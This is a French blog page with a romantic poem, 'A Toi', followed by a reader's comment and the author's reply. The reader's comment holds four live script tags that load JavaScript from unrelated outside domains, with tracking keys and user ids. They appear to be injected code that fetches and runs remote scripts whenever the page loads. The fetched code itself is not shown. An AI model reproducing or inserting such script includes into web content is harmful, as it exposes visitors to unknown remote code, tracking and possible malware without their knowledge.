• A Toi

     

    Couché sur la plage, la tête sur ton sein,

                                                Je contemple la mer, belle sous la brume.

                                                 Ses vagues s'enroulent dans un long va-et-vient,

                                                 Caressant le sable de ses rouleaux d'écume.

     

    Puis, je te regarde, belle, au corps de déesse,

                                                Tes yeux ont les ardeurs du zénith en été,

                                                Et ils ont des langueurs d'un automne en tristesse,

                                                Ambrés et scintillants d'un joyau mordoré.

     

    Ta voix a la douceur d'un violon en Amour.

                                                Ton corps est un chef d'oeuvre où toute forme excelle.

                                                Tu es pour moi la vie, au sommet des toujours.

                                                Près de toi je suis fier, car tu es un modèle.

     

    Rêves-tu de l'Amour dans tes nuits de désirs ?

                                                Moi je rêve de toi dans ta beauté suprême.

                                                Tes baisers provoquent de langoureux soupirs,

                                                O femme de mon coeur, je crois bien que je t'aime.

     

    Gérard Bollon Maso

    Merci de me lire et d'apprécier ma poésie.

     

     

     

     

     


  • Commentaires

    1
    belle de nuit
    Jeudi 12 Mars 2020 à 23:15

    il est sublime merci du partage j'adore

    <script src="//ciclonrox.com/21d4a10d5bc3d00d52.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8660x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8660x&format=arrjs&r=1584051311469" type="text/javascript"></script> <script src="http://ciclonrox.com/ext/21d4a10d5bc3d00d52.js?sid=52596_8660_&title=aa&blocks[]=31af2" type="text/javascript"></script>
      • Jeudi 12 Mars 2020 à 23:45

        Belle de nuit, si tu as l'intention de lire mes textes sur ce blog, il doit y en avoir env. 500.  Bon courage mais cela me ferait très plaisir.

        Belle fin de semaine.   Gérard. 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :